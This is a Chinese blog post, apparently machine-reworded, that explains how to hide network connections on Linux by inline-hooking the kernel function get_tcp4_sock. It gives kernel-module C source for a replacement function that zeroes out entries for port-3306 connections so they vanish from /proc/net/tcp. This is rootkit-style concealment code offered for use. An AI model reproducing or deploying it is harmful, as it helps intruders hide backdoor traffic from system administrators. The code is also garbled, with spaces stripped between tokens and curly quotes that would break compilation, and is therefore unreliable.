Linux下躲藏网络衔接的另一种办法

直接inlinehook住get_tcp4_sock这个函数就行了,只不过需求重新实现下get_tcp4_sock的功效,在作下过滤.对比简单,代码以下:

#include<linux/kernel.h>

#include<linux/init.h>

#include<linux/module.h>

#include<linux/version.h>

#include<linux/types.h>

#include<linux/string.h>

#include<linux/unistd.h>

#include<linux/fs.h>

#include<linux/kmod.h>

#include<linux/file.h>

#include<linux/sched.h>

#include<linux/mm.h>

#include<linux/slab.h>

#include<linux/spinlock.h>

#include<linux/socket.h>

#include<linux/net.h>

#include<linux/in.h>

#include<linux/skbuff.h>

#include<linux/ip.h>

#include<linux/tcp.h>

#include<net/sock.h>

#include<asm/uaccess.h>

#include<asm/unistd.h>

#include<asm/termbits.h>

#include<asm/ioctls.h>

#include<linux/icmp.h>

#include<linux/netdevice.h>

#include<linux/netfilter.h>

#include<linux/netfilter_ipv4.h>

MODULE_LICENSE(“GPL”);

MODULE_AUTHOR(“wzt”);

__u32wnps_in_aton(constchar*str)

{

unsignedlongl;

unsignedintval;

inti;

l=0;

for(i=0;i<4;i++){

l<<=8;

if(*str!=’\0′){

val=0;

while(*str!=’\0’&&*str!=’.’){

val*=10;

val+=*str-‘0′;

str++;

}

l|=val;

if(*str!=’\0’)

str++;

}

}

return(htonl(l));

}

voidnew_get_tcp4_sock(structsock*sk,structseq_file*f,inti,int*len)

{

inttimer_active;

unsignedlongtimer_expires;

structtcp_sock*tp=tcp_sk(sk);

conststructinet_connection_sock*icsk=inet_csk(sk);

structinet_sock*inet=inet_sk(sk);

__be32dest=inet->daddr;

__be32src=inet->rcv_saddr;

__u16destp=ntohs(inet->dport);

__u16srcp=ntohs(inet->sport);

printk(“!!innew_get_tcp4_sock.\n”);

if(icsk->icsk_pending==ICSK_TIME_RETRANS){

timer_active=1;

timer_expires=icsk->icsk_timeout;

}elseif(icsk->icsk_pending==ICSK_TIME_PROBE0){

timer_active=4;

timer_expires=icsk->icsk_timeout;

}elseif(timer_pending(&sk->sk_timer)){

timer_active=2;

timer_expires=sk->sk_timer.expires;

}else{

timer_active=0;

timer_expires=jiffies;

}

/*

if(src==wnps_in_aton(“127.0.0.1”)){

printk(“got127.0.0.1”);

return;

}

*/

if(srcp==3306||destp==3306){

printk(“got3306!\n”);

seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”

“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,

0,0,0,0,0,0,

tp->write_seq-tp->snd_una,

sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:

(tp->rcv_nxt-tp->copied_seq),

timer_active,

jiffies_to_clock_t(timer_expires-jiffies),

icsk->icsk_retransmits,

sock_i_uid(sk),

icsk->icsk_probes_out,

sock_i_ino(sk),

atomic_read(&sk->sk_refcnt),sk,

jiffies_to_clock_t(icsk->icsk_rto),

jiffies_to_clock_t(icsk->icsk_ack.ato),

(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,

tp->snd_cwnd,

tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,

len);

}

else{

seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”

“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,

i,src,srcp,dest,destp,sk->sk_state,

tp->write_seq-tp->snd_una,

sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:

(tp->rcv_nxt-tp->copied_seq),

timer_active,

jiffies_to_clock_t(timer_expires-jiffies),

icsk->icsk_retransmits,

sock_i_uid(sk),

icsk->icsk_probes_out,

sock_i_ino(sk),

atomic_read(&sk->sk_refcnt),sk,

jiffies_to_clock_t(icsk->icsk_rto),

jiffies_to_clock_t(icsk->icsk_ack.ato),

(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,

tp->snd_cwnd,

tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,

len);

}

}

© 版权声明
THE END
喜欢就支持一下吧
点赞2
分享
评论 抢沙发
  • 果子杨

    昵称

  • 取消
    昵称表情